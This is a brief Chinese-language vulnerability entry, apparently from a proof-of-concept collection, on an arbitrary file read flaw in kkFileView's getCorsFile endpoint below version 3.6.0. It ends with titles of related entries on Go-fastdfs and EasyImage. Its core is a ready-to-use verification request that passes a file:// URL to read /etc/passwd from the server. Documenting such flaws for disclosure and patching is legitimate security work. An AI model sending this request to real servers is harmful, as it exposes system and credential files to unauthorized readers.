kkFileView getCorsFile 3.6.0 版本以下存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的任意文件,获取服务器敏感信息
主页面
验证POC
/getCorsFile?urlPath=file:///etc/passwd
Go-fastdfs upload 任意文件上传漏洞 CVE-2023-1800 EasyImage down.php 任意文件读取漏洞